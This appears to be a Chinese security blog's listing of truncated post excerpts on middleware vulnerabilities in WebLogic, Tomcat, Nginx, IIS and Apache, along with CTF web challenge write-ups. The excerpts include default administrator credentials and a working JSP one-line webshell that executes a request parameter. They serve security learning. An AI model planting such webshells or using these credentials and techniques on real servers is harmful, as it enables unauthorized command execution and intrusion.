Weblogic中间件安全

弱口令 User ID system Password password Level Administrator User ID weblogic Password weblogic Level Administrator User ID weblogic Password weblogic User ID admin Password security User ID...

Tomcat 中间件漏洞

配置文件错误造成的任意写漏洞 (CVE-2017-12615) Tomcat版本:8.5.19 当web.xml中配置了readonly=false时,可以用PUT方法往服务器写文件 试试 发现确实被写入了 直接写木马就ge...

JSP一句话木马

挖洞遇见些JSP站,JSP一句话木马还是得会吧 <%Runtime.getRuntime().exec(request.getParameter("cmd"));%> 无回显命令执行 http://127.0.0.1/shell.jsp?cmd=calc <%    if("023".equals(request.g...

[GYCTF2020]Ezsqli

知识点:information_schema.tables变形。无列名比较注入 fuzz一下 发现可用^异或,可以进行盲注 因为information_schema被过滤了,我们要获得表名可以用 sys.schema_table_statistics_w...

bestphp’s revenge

知识点:session反序列化, 反序列化时对原生类SoapClient的利用 ,CRLF 参考文章 https://www.anquanke.com/post/id/153065#h2-1 这道题考的蛮多的 进来后是这样 同时目录下还有一个flag.ph...

[NCTF2019]True XML cookbook

知识点:xxe 内网渗透 进来后是这样,这好像是那个啥xxelabs的登录框,而且结合题目名不难想到是xxe随便输点东西进去 发现数据是以xml形式传输而且<username>还有回显,xxe一波 xxe实锤...

Nginx中间件漏洞

‘/’字符解析漏洞(和iis7/7.5漏洞利用方法一致) url/xxx.gif/xx.php会被解析为php文件 前提条件:cgi.fix_pathinfo=1 目录遍历小洞 前提条件: nginx-conf 把这个选项改为on即可 目录穿越...

iis中间件漏洞

关于/的php解析漏洞(iis7/7.5解析漏洞) 适用版本 iis7/7.5 前提条件: 1.php.ini里的cgi.fix_pathinfo设置为1,且结合方式是fast-cgi 2.开启Fast-CGI运行模式 作用: 在访问某个文件时,在路径后加 /*....

Apache httpd中间件漏洞

apache文件多后缀名解析漏洞 与其说这是一个漏洞,不如说这是一个特性,很多程序员不知道这种特性,所以会写出有问题的代码。 特性:多后缀名(全版本都有这个特性) apache在解析一个文件的后缀名时,是从...

[RoarCTF 2019]Simple Upload

知识点:thinkphp控制器路由,目录爆破,文件上传 进来后是这样,根据thinkphp控制器路由规则,文件上传点在 index.php/home/index/upload 可以看到这里让你上传的name=file的文件后缀不能为php ...